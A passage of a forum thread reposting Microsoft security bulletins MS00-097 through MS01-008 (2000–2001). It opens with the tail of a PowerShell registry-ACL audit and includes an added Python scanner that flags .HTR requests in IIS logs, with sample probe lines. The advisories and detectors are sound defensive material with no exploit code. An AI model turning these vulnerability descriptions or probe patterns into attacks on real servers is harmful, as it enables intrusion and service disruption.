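                    Rights   = $ace.RegistryRights
                    Finding  = 'broad principal can modify key'
                }
            }
            elseif ($key.ReadIsSensitive -and (($rights -band [int] $readMask) -ne 0)) {
                [pscustomobject]@{
                    Key      = $key.Path
                    Identity = $ace.IdentityReference.Value
                    Rights   = $ace.RegistryRights
                    Finding  = 'broad principal can read SNMP community names'
                }
            }
        }
    }
}

Test-SensitiveRegistryAcl -Keys $AuditKeys -Principals $BroadPrincipals | Format-Table -AutoSize
```

An empty result set (apart from "key not present" rows) means none of the listed principals hold write rights on the keys, which is the state the Microsoft tool is meant to produce.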
socalgal
12-15-2000, 10:09 PM
Microsoft Security Bulletin (MS00-097)
Patch Available for “Severed Windows Media Server Connection” Vulnerability
Originally posted: December 15, 2000
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows Media™ Services. The vulnerability could allow a malicious user to degrade the performance of a Windows Media server, possibly to the point where it could no longer provide useful service.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-097.asp
Issue:
When a connection to a Windows Media server is made, then severed, using a particular sequence of TCP/IP packets, the Windows Media Unicast Service does not release all of the resources allocated to the connection. By repeatedly making and then severing connections in this manner, a malicious user could exhaust the resources on a server, thereby preventing it from providing streaming media services.
If an affected server were attacked via this vulnerability, the server operator could restore normal operation by restarting the Windows Media Service. Any sessions that were in progress would be lost, but users could immediately reconnect and resume normal use.
Affected Software Versions:
Microsoft Windows Media Services 4.0
Microsoft Windows Media Services 4.1
Note: Windows Media Services 4.1 ships as part of Windows 2000, and the patch for Windows Media Services 4.1 can be applied atop Windows 2000 Gold or SP1. The fix will be incorporated into Windows 2000 SP3.
Note: Windows Media Services 4.0 does not ship as part of any other product. The patch for Windows Media Services 4.0 can be applied to any machine already running the product, and will not be included in any other product's future service packs.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-097, http://www.microsoft.com/technet/security/bulletin/fq00-097.asp
Microsoft Knowledge Base article Q281256 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks NTT Communications http://www.ntt.com for reporting this issue to us and working with us to protect customers.
Revisions:
December 15, 2000: Bulletin Created.
socalgal
12-19-2000, 06:00 PM
Microsoft Security Bulletin (MS00-098)
Patch Available for “Indexing Service File Enumeration” Vulnerability
Originally posted: December 19, 2000
Summary:
Microsoft has released a patch that eliminates a security vulnerability in a component that ships as part of Microsoft® Windows® 2000. The vulnerability could allow a malicious web site operator to learn the names and properties of files and folders on the machine of a visiting user.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-098.asp
Issue:
An ActiveX control that ships as part of Indexing Service is incorrectly marked as “safe for scripting”, thereby enabling it to be executed by web site applications. The control at issue here could be used to enumerate files and folders, and to view their properties. It would not be necessary for Indexing Service to be running in order for the vulnerability to be exploited; however, if it were running, the control also could be used to search for files containing specific words. The vulnerability could not be used to read files, except via a fairly unlikely scenario discussed in detail in the FAQ. It could not be used under any conditions to change, add or delete information on the user’s computer.
A patch has been provided for Indexing Service 3.0, but not for Index Server 2.0. This is primarily due to the different delivery vehicles for the two versions. Indexing Service 3.0 ships as part of all versions of Windows 2000; thus, the vulnerability could affect all Windows 2000 users. In contrast, Index Server 2.0 ships as part of the Windows NT 4.0 Option Pack; thus, to be affected by the vulnerability in Index Server 2.0, a webmaster would need to browse untrustworthy Internet sites from a web server, which is contrary to normal recommended practices.
Affected Software Versions:
Index Server 2.0
Indexing Service 3.0
Note: Index Server 2.0 ships as part of the Windows NT 4.0 Option Pack. Indexing Service 3.0 ships as part of all versions of Windows 2000.
Patch Availability:
Indexing Service 3.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26595
Note: As discussed in the FAQ, a patch has not been provided for Index Server 2.0, because this product should only be installed on web servers, which should never be used for browsing the Internet.
Note: This patch can be applied to systems running Windows 2000 Gold or Service Pack 1. It will be included in Windows 2000 Service Pack 3.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-098, http://www.microsoft.com/technet/security/bulletin/fq00-098.asp
Microsoft Knowledge Base article Q280838 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions:
December 19, 2000: Bulletin Created.
socalgal
12-20-2000, 05:54 PM
Microsoft Security Bulletin (MS00-099)
Patch Available for “Directory Service Restore Mode Password” Vulnerability
Originally posted: December 20, 2000
Summary:
Microsoft has released a patch that eliminates a security vulnerability affecting Microsoft® Windows® 2000 domain controllers. The vulnerability could allow a malicious user with physical access to a domain controller to install malicious software on it.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-099.asp
Issue:
Windows 2000 provides several special operating modes that can be chosen at boot time in order to allow the administrator to troubleshoot and restore a machine with a damaged configuration.
One of these, Directory Service Restore Mode, is designed to allow the Active Directory to be repaired and restored on a domain controller. A password is required in order to operate the system in this mode. However, if the “Configure Your Server” tool was used when the machine was originally promoted to domain controller, that password would be blank. This could enable a malicious user to log onto the machine in Directory Service Restore Mode. Once logged on, the malicious user could alter system components or install bogus ones that would execute when a bona fide administrator subsequently logged onto the machine.
There are three significant mitigating factors associated with this vulnerability:
+ The malicious user would need physical access to the machine in order to log into it in Directory Service Restore Mode. However, security best practices strongly recommend against ever giving unprivileged users physical access to critical servers like domain controllers. Customers who have followed this guidance would not be affected by the vulnerability.
+ The vulnerability only occurs if the “Configure Your Server” tool was used to promote the server to domain controller. If the DCPROMO tool was used, the machine could not be affected by the vulnerability.
+ The “Configure Your Server” tool can only be run on the first domain controller in a forest. As a result, no other servers could be affected by the vulnerability.
A second troubleshooting mode also is affected. When the Directory Service Restore Mode password is set, the password for the Recovery Console is automatically synchronized with it. As a result, machines affected by this vulnerability would have a blank password for both the Directory Service Restore Mode and the Recovery Console. However, the scope of the vulnerability is unchanged by the involvement of the Recovery Console, for better or worse.
Affected Software Versions:
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Note: Windows 2000 workstations are unaffected by this vulnerability.
Patch Availability:
The patch has been temporarily removed, but will be re-posted shortly.
Note: On Windows 2000 Server and Advanced Server systems, this patch can be installed atop either the Gold version or Service Pack 1. It will be included in Windows Server and Advanced Server, Service Pack 2.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-099, http://www.microsoft.com/technet/security/bulletin/fq00-099.asp
Microsoft Knowledge Base article Q271641 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks John Sherriff of the Wool Research Organization of New Zealand for reporting this issue to us and working with us to protect customers.
Revisions:
December 20, 2000: Bulletin Created.
[This message has been edited by socalgal (edited 12-20-2000).]
socalgal
12-22-2000, 08:06 PM
Microsoft Security Bulletin (MS00-100)
Patch Available for “Malformed Web Form Submission” Vulnerability
Originally posted: December 22, 2000
Summary:
Microsoft has released a patch that eliminates a security vulnerability in a component that ships as part of Microsoft® Internet Information Server. The vulnerability could potentially allow an attacker to prevent an affected web server from providing useful service.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq00-100.asp
Issue:
The FrontPage Server Extensions (FPSE) ship with and are installed by default as part of IIS 4.0 and 5.0. The most familiar FPSE functions allow web site and content management; however, FPSE also provides browse-time support functions.
Among the functions included in the latter category are ones that help process web forms that have been submitted by a user. A vulnerability exists in one of these functions. If a malicious user levied a specially-malformed form submission to an affected server, it would cause the IIS service to fail. The vulnerability does not provide the opportunity to misuse any of the FPSE administrative or content management functions.
To resume normal operation on an IIS 4.0 server, the operator would need to restart the service. In contrast, if an IIS 5.0 server were attacked via this vulnerability, the IIS service would, by default, automatically restart almost immediately. Although any web sessions that were in progress at the time of the attack would be lost, the server would be able to accept new connections as soon as the service was restarted. FPSE is installed by default as part of IIS 4.0 and 5.0, but, in keeping with best practices, Microsoft recommends that they be disabled if not needed.
Affected Software Versions:
Microsoft IIS 4.0
Microsoft IIS 5.0
Patch Availability:
Microsoft IIS 5.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26277
Microsoft IIS 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26704
Note: The IIS 5.0 patch can be applied atop systems running either Windows 2000 Gold or Service Pack 1. It will be included in Windows 2000 Service Pack 2.
Note: The IIS 4.0 patch can be applied atop systems running Windows NT 4.0 Service Pack 6a or 5. It will be included in Windows NT 4.0 Service Pack 7.
Note: IIS users who have removed the FPSE are not affected by this vulnerability and do not need to take further action.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS00-100, http://www.microsoft.com/technet/security/bulletin/fq00-100.asp
Microsoft Knowledge Base article Q280322 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks eEye Digital Security http://www.eEye.com for reporting this issue to us and working with us to protect customers.
Revisions:
December 22, 2000: Bulletin Created.
socalgal
01-11-2001, 06:56 PM
Microsoft Security Bulletin (MS01-001)
Patch Available for "Web Client NTLM Authentication" Vulnerability
Originally posted: January 11, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in a component that ships with Microsoft® Office 2000, Windows 2000, and Windows Me. The vulnerability could, under certain circumstances, allow a malicious user to obtain cryptographically protected logon credentials from another user when requesting an Office document from a web server.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-001.asp
Issue:
The Web Extender Client (WEC) is a component that ships as part of Office 2000, Windows 2000, and Windows Me. WEC allows IE to view and publish files via web folders, similar to viewing and adding files in a directory through Windows Explorer.
Due to an implementation flaw, WEC does not respect the IE Security settings regarding when NTLM authentication will be performed – instead, WEC will perform NTLM authentication with any server that requests it. If a user established a session with a malicious user’s web site – either by browsing to the site or by opening an HTML mail that initiated a session with it – an application on the site could capture the user’s NTLM credentials. The malicious user could then use an offline brute force attack to derive the password or, with specialized tools, could submit a variant of these credentials in an attempt to access protected resources.
The vulnerability would only provide the malicious user with the cryptographically protected NTLM authentication credentials of another user. It would not, by itself, allow a malicious user to gain control of another user’s computer or to gain access to resources to which that user was authorized access. In order to leverage the NTLM credentials (or a subsequently cracked password), the malicious user would have to be able to remotely logon to the target system. However, best practices dictate that remote logon services be blocked at border devices, and if these practices were followed, they would prevent an attacker from using the credentials to logon to the target system.
Affected Software Versions:
Microsoft Office 2000
Microsoft Windows 2000
Microsoft Windows Me
Patch Availability:
Microsoft Office 2000 (All Platforms): http://officeupdate.microsoft.com/2000/downloaddetails/wecsec.htm
Microsoft Windows 2000 (Without Office 2000): http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26889
Microsoft Windows Me (Without Office 2000): http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26705
Note: Since the affected component ships with the above products independent of Office 2000, we have provided patches for affected systems that may not be running Office 2000. As discussed in the FAQ, the patch and vulnerability only affect machines running Internet Explorer 5.0 or later with Web Folders enabled.
Note: This patch will be included in Windows 2000 Service Pack 2.
Note: Additional security patches are available at the Microsoft Download Center.
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-001, http://www.microsoft.com/technet/security/bulletin/fq01-001.asp
Microsoft Knowledge Base article Q282132 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks David Litchfield of @stake for reporting this issue to us and working with us to protect customers.
Revisions:
January 11, 2001: Bulletin Created.
socalgal
01-25-2001, 10:01 PM
Microsoft Security Bulletin (MS01-002)
Patch Available for “PowerPoint File Parsing” Vulnerability
Originally posted: January 22, 2001
Revised: January 25, 2001
Summary:
On January 22, Microsoft released the original version of this bulletin, to advise customers of the availability of a patch that eliminates a security vulnerability in Microsoft® PowerPoint 2000. The vulnerability could allow a user to construct a PowerPoint file that, when opened, could potentially run code on the reader’s system.
However, the originally released patch did not include the entirety of the fixes related to this vulnerability. An updated patch has been made available that corrects the originally reported vulnerability. Customers who downloaded and installed the original patch should download and install the updated patch. Instructions for determining the current version of the patch and for installing the updated patch are available via the Patch Availability URL below.
This bulletin has also been updated to more accurately reflect the conditions under which this vulnerability may be exploited.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-002.asp
Issue:
A parsing routine that is executed when PowerPoint 2000 opens files contains an unchecked buffer. If an attacker inserted specially chosen data into a PowerPoint file and could entice another user into opening the file on his machine, the data would overrun the buffer, causing either of two effects. In the less serious case, overrunning the data would cause PowerPoint to fail, but wouldn’t have any other effect.
In the more serious case, overrunning the buffer could allow the attacker to cause code of her choice to run on the user’s machine. The code could take any action that the user himself could take on the machine. Typically, this would enable the attacker’s code to add, change or delete data, communicate with a remote server, or take other actions.
In order for this behavior to occur, a malicious user would need to entice a user into either opening the malformed PowerPoint 2000 file, visiting a malicious website, or viewing a specially crafted html email message.
Affected Software Versions:
Microsoft PowerPoint 2000
Patch Availability
Microsoft PowerPoint 2000: http://officeupdate.microsoft.com/2000/downloaddetails/ppt2ksec.htm
Note: This hotfix requires either Office 2000 SR-1 or SR-1a. This hotfix will be included in Office 2000 SR-1 Service Pack 3.
Note: Additional security patches are available at the Microsoft Download Center.
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-002, http://www.microsoft.com/technet/security/bulletin/fq01-002.asp
Microsoft Knowledge Base (KB) article Q285978, http://www.microsoft.com/technet/support/kb.asp?ID=285978
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks Dave Aitel and Frank Swiderski of @stake (http://www.atstake.com) for reporting this issue to us and working with us to protect customers.
Revisions:
January 22, 2001: Bulletin created.
January 25, 2001: Version 2.0 Bulletin revised to reflect availability of an updated patch and changes in the conditions required to exploit the vulnerability.
socalgal
01-26-2001, 06:59 PM
Microsoft Security Bulletin (MS01-003)
Patch Available for "Winsock Mutex" Vulnerability
Originally posted: January 24, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows NT 4.0. The vulnerability could allow a malicious user to run a special program to disable an affected computer’s network functionality.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-003.asp
Issue
Like all other objects under Windows NT 4.0, mutexes – synchronization objects that govern access to resources – have permissions associated with them, that govern how they can be accessed. However, a particular mutex used to govern access to a networking resource has inappropriately loose permissions. This could enable an attacker who had the ability to run code on a local machine to monopolize the mutex, thereby preventing any other processes from using the resource that it controlled. This would have the effect of preventing the machine from participating in the network.
The attacker would require interactive logon access to the affected machine. This significantly limits the scope of the vulnerability because, if normal security recommendations have been followed, unprivileged users will not be granted interactive logon rights to critical machines like servers. Unprivileged users typically are granted interactive logon rights to workstations and terminal servers. However, a workstation would not be a tempting target for an attacker, because he could only use this vulnerability to deny service to himself. The machines most likely to be affected would be terminal servers.
Affected Software Versions:
Microsoft Windows NT 4.0
Microsoft Windows NT 4.0, Terminal Server Edition
Patch Availability:
Windows NT 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27272
Windows NT 4.0, Terminal Server Edition: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27291
Note: Additional security patches are available at the Microsoft Download Center.
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-003, http://www.microsoft.com/technet/security/bulletin/fq01-003.asp
Microsoft Knowledge Base article Q279336 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks Arne Vidstrom ( http://ntsecurity.nu ) for reporting this issue to us and working with us to protect customers.
Revisions:
January 24, 2001: Bulletin Created.
socalgal
01-30-2001, 06:43 AM
Microsoft Security Bulletin (MS01-004)
Patch Available for New Variant of “File Fragment Reading via .HTR” Vulnerability
Originally posted: January 29, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Internet Information Service. The vulnerability could enable an attacker, under very unusual conditions, to read fragments of files from a web server.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-004.asp
Issue:
This vulnerability involves a new variant of the “File Fragment Reading via .HTR” vulnerability, previous variants of which were discussed in Microsoft Security Bulletins MS00-031 and MS00-044. Like the original variants, this one could enable an attacker to request a file in a way that would cause it to be processed by the .HTR ISAPI extension. The result of doing this is that fragments of server-side files like .ASP files could potentially be sent to the attacker. There is no capability via the vulnerability to add, change or delete files on the server, or to access a file without permissions.
There are a number of significant restrictions on this vulnerability:
The effect of normal .HTR processing would be to strip out the very data that would be most likely to contain sensitive data.
There would need to be zeros fortuitously located in the server memory in order for the file fragments to be sent.
If best practices have been followed regarding the need to avoid ever storing sensitive information in .ASP and other server-side files, there will be no sensitive information in the file to begin with.
Customers who have previously disabled the .HTR functionality would not be affected by this vulnerability. Microsoft recommends that all customers who haven’t already disabled .HTR do so, unless there is a business-critical reason for keeping it. For the latter group of customers, a patch is available that eliminates this vulnerability, as well as those discussed in Microsoft Security Bulletins MS00-031 and MS00-044.
Affected Software Versions:
Microsoft Internet Information Server 4.0
Microsoft Internet Information Service 5.0
Patch Availability
As noted above, the recommended method of eliminating this vulnerability is to disable .HTR. (Instructions for doing this are provided in the FAQ). Customers who must retain the .HTR functionality should apply the patch:
IIS 4.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27492
IIS 5.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27491
Note: The patch also eliminates the vulnerabilities discussed in Microsoft Security Bulletins MS00-031 and MS00-044.
Note: The IIS 4.0 patch can be applied to systems running Windows NT 4.0 Service Packs 5 and 6a. It will be included in Service Pack 7.
Note: The IIS 5.0 patch can be applied to systems running Windows 2000 Gold and Service Packs 1 and 2. It will be included in Service Pack 3.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-004, http://www.microsoft.com/technet/security/bulletin/fq01-004.asp
Microsoft Knowledge Base article Q285985 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions:
January 29, 2001: Bulletin Created.
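One way to check whether a server still receives requests routed to the .HTR extension, as an added example that is not from the bulletin or from IIS, is to scan its W3C extended logs. The field names follow the IIS W3C format; the log lines themselves are constructed.

```python
"""Flag IIS requests routed to the .HTR ISAPI extension in W3C extended logs.

Added example, not part of the bulletin or of IIS. It parses the #Fields
header so field order does not matter, URL-decodes the URI stem, and
reports every request whose final extension is .htr (any letter case).
"""
from collections import Counter
from typing import Dict, Iterator, List
from urllib.parse import unquote

# Constructed sample log in IIS W3C extended format (not real traffic).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-02-01 00:00:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-02-01 10:00:01 192.0.2.10 GET /default.asp - 200
2001-02-01 10:00:02 192.0.2.10 GET /images/logo.gif - 200
2001-02-01 10:00:05 198.51.100.7 GET /samples/chpass.htr - 200
2001-02-01 10:00:06 198.51.100.7 GET /orders/list.ASP.HTR - 404
2001-02-01 10:00:07 198.51.100.7 GET /scripts/x%2Ehtr - 200
2001-02-01 10:00:09 192.0.2.10 GET /files/report.htr.txt - 200
"""


def parse_w3c(log_text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per request, keyed by the names in the #Fields line."""
    fields: List[str] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue  # other directives carry no request data
        values = line.split()
        if not fields or len(values) != len(fields):
            continue  # header not seen yet or malformed row: skip, don't guess
        yield dict(zip(fields, values))


def is_htr_request(uri_stem: str) -> bool:
    """True when the decoded URI stem's final extension is .htr (any case)."""
    last_segment = unquote(uri_stem).rsplit("/", 1)[-1]
    _, dot, ext = last_segment.rpartition(".")
    return bool(dot) and ext.lower() == "htr"


def find_htr_requests(log_text: str) -> List[Dict[str, str]]:
    """Return the log rows whose request was routed to the .HTR extension."""
    return [row for row in parse_w3c(log_text)
            if is_htr_request(row.get("cs-uri-stem", ""))]


def htr_clients(log_text: str) -> Counter:
    """Count flagged requests per client address, for triage."""
    return Counter(row["c-ip"] for row in find_htr_requests(log_text))


if __name__ == "__main__":
    for row in find_htr_requests(SAMPLE_LOG):
        print(row["date"], row["time"], row["c-ip"],
              row["cs-uri-stem"], row["sc-status"])
    print(htr_clients(SAMPLE_LOG))
```

A server that has disabled the .HTR mapping should answer such requests with an error rather than passing them to the extension, so any 200 responses here are worth a look.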
socalgal
01-30-2001, 07:14 PM
Microsoft Security Bulletin (MS01-005)
Tool and Patch Available to correct Hotfix Packaging Anomalies
Originally posted: January 30, 2001
Summary:
Microsoft has released a tool and patch that allow customers to diagnose and eliminate the effects of anomalies in the packaging of hotfixes for English language versions of Microsoft® Windows 2000. Under certain circumstances, these anomalies could cause the removal of some hotfixes, which could include some security patches, from a Windows 2000 system.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-005.asp
Issue:
Microsoft packages all Windows 2000 hotfixes (including security patches) with a catalog file that lists all of the valid hotfixes that have been issued to date. The catalog is digitally signed to ensure its integrity, and Windows File Protection uses the signed catalog to determine which hotfixes are valid.
An error in the production of the catalog files for English language Windows 2000 Post Service Pack 1 hotfixes made available through December 18, 2000 could, under very unlikely circumstances, cause Windows File Protection to remove a valid hotfix from a system. The removal of a hotfix could cause a customer’s system to revert to a version of a Windows 2000 module that contained a security vulnerability.
Windows File Protection will only remove valid hotfixes from a Windows 2000 system under a very restrictive set of circumstances. The system administrator would have to have applied multiple hotfixes in an order other than that in which Microsoft produced and packaged them. Furthermore, Windows File Protection would only remove hotfixes from a system if it were run explicitly (by running sfc /scannow for instance) or triggered by some administrator action (such as specifying that it be invoked under a group policy).
Affected Software Versions:
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Patch Availability:
Diagnostic tool: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27333
Microsoft Windows 2000 Gold: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27332
Microsoft Windows 2000 SP1: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=27330
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-005, http://www.microsoft.com/technet/security/bulletin/fq01-005.asp
Microsoft Knowledge Base article Q281767 discusses this issue and will be available soon.
Microsoft Knowledge Base article Q282784 describes the tool released to address this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Revisions:
January 30, 2001: Bulletin Created.
socalgal
01-31-2001, 07:54 PM
Microsoft Security Bulletin (MS01-006)
Patch Available for “Invalid RDP Data” Vulnerability
Originally posted: January 31, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability affecting Microsoft® Windows® 2000 terminal servers. The vulnerability could allow an attacker to cause an affected server to fail.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-006.asp
Issue:
The implementation of the Remote Data Protocol (RDP) in Windows 2000 Terminal Service does not correctly handle a particular series of data packets. If such a series of packets were received by an affected server, it would cause the server to fail. The server could be put back into normal service by rebooting it, but any work in progress at the time of the attack would be lost.
It would not be necessary for an attacker to be able to start a session with an affected server in order to exploit this vulnerability – he would only need the ability to send the correct series of packets to the RDP port on the server. The specific sequence of data packets involved in this vulnerability cannot be generated as part of a legitimate terminal server session. Windows NT 4.0 terminal servers are not affected by this vulnerability.
Affected Software Versions:
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Note: The above products are only affected by this vulnerability if used as terminal servers.
Note: This patch can be applied to systems running Windows 2000 Gold, Service Pack 1, and Service Pack 2. It will be included in Windows 2000 Service Pack 3.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-006, http://www.microsoft.com/technet/security/bulletin/fq01-006.asp
Microsoft Knowledge Base article Q286132 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks Yoichi Ubukata and Yoshihiro Kawabata for reporting this issue to us and working with us to protect customers.
Revisions:
January 31, 2001: Bulletin Created.
socalgal
02-05-2001, 07:16 PM
Microsoft Security Bulletin (MS01-007)
Patch Available for “Network DDE Agent Request” Vulnerability
Originally posted: February 05, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows® 2000. The vulnerability could, under certain conditions, allow an attacker to gain complete control over an affected machine.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-007.asp
Issue:
Network Dynamic Data Exchange (DDE) is a technology that enables applications on different Windows computers to dynamically share data. This sharing is effected via communications channels called trusted shares, which are managed by a service called the Network DDE Agent. By design, processes on the local machine can levy requests upon the Network DDE Agent, including ones that indicate what application should be run in conjunction with a particular trusted share. However, a vulnerability exists because, in Windows 2000, the Network DDE Agent runs using the Local System security context and processes all requests using this context, rather than that of the user. This would give an attacker an opportunity to cause the Network DDE Agent to run code of her choice in Local System context, as a means of gaining complete control over the local machine.
In order to exploit this vulnerability, the attacker would need the ability to run a program on an affected machine that would levy the appropriate requests. However, best practices strongly recommend against ever allowing unprivileged users to run code on security-critical machines such as domain controllers and other servers; if these recommendations have been followed, such machines would not be at risk. In addition, terminal servers are not affected by this vulnerability (except in the case where unprivileged users are allowed to log on at the console, which is never recommended). As a result, workstations are likely to be the machines primarily affected by the vulnerability. This would tend to limit the damage that could be done via this vulnerability because, in most cases, even gaining complete control of a workstation would not convey any additional privileges on the domain.
Microsoft recommends that customers using Windows 2000 workstations or who allow unprivileged users to run code on Windows 2000 servers apply the patch immediately. In addition, customers operating Windows 2000 web servers should consider applying the patch to those machines as well, as a precautionary measure. If an attacker were able to gain the ability to run code in a restricted context on a web server via another vulnerability, this vulnerability would provide a way to immediately elevate her privileges and cause broader damage.
Affected Software Versions:
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows 2000 Advanced Server
Note: This patch can be installed on systems running Windows 2000 Gold, Service Pack 1, and Service Pack 2. It will be included in Service Pack 3.
Note: Additional security patches are available at the Microsoft Download Center
More Information:
Please see the following references for more information related to this issue.
Frequently Asked Questions:
Microsoft Security Bulletin MS01-007, http://www.microsoft.com/technet/security/bulletin/fq01-007.asp
Microsoft Knowledge Base article Q285851 discusses this issue and will be available soon.
Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp
Obtaining Support on this Issue:
This is a fully supported patch. Information on contacting Microsoft Product Support Services is available at http://support.microsoft.com/support/contact/default.asp
Acknowledgments:
Microsoft thanks Dildog of @Stake ( http://www.atstake.com ) for reporting this issue to us and working with us to protect customers.
Revisions:
February 05, 2001: Bulletin Created.
socalgal
02-07-2001, 06:29 PM
Microsoft Security Bulletin (MS01-008)
Patch Available for "NTLMSSP Privilege Elevation" Vulnerability
Originally posted: February 07, 2001
Summary:
Microsoft has released a patch that eliminates a security vulnerability in Microsoft® Windows NT 4.0. The vulnerability could allow a locally logged on user to grant herself administrator level privileges.
Frequently asked questions regarding this vulnerability and the patch can be found at http://www.microsoft.com/technet/security/bulletin/fq01-008.asp
Issue:
A flaw in the NTLM Security Support Provider (NTLMSSP) service could potentially allow a non-administrative user to gain administrative control over the system. In order to perform this attack the user would need a valid login account and the ability to execute arbitrary code on the system.
This vulnerability could only be exploited by an attacker who could log onto the affected machine interactively. However, best practices strongly suggest that unprivileged users not be allowed to interactively log onto business-critical servers like domain controllers, ERP servers, print and file servers, database servers, and others. If this recommendation has been followed, machines such as these would not be at risk from this vulnerability and, as a result, the machines most likely to be affected would be workstations and terminal servers.
Affected Software Versions:
Microsoft Windows NT 4.0 Workstation
Microsoft Windows NT 4.0 Server
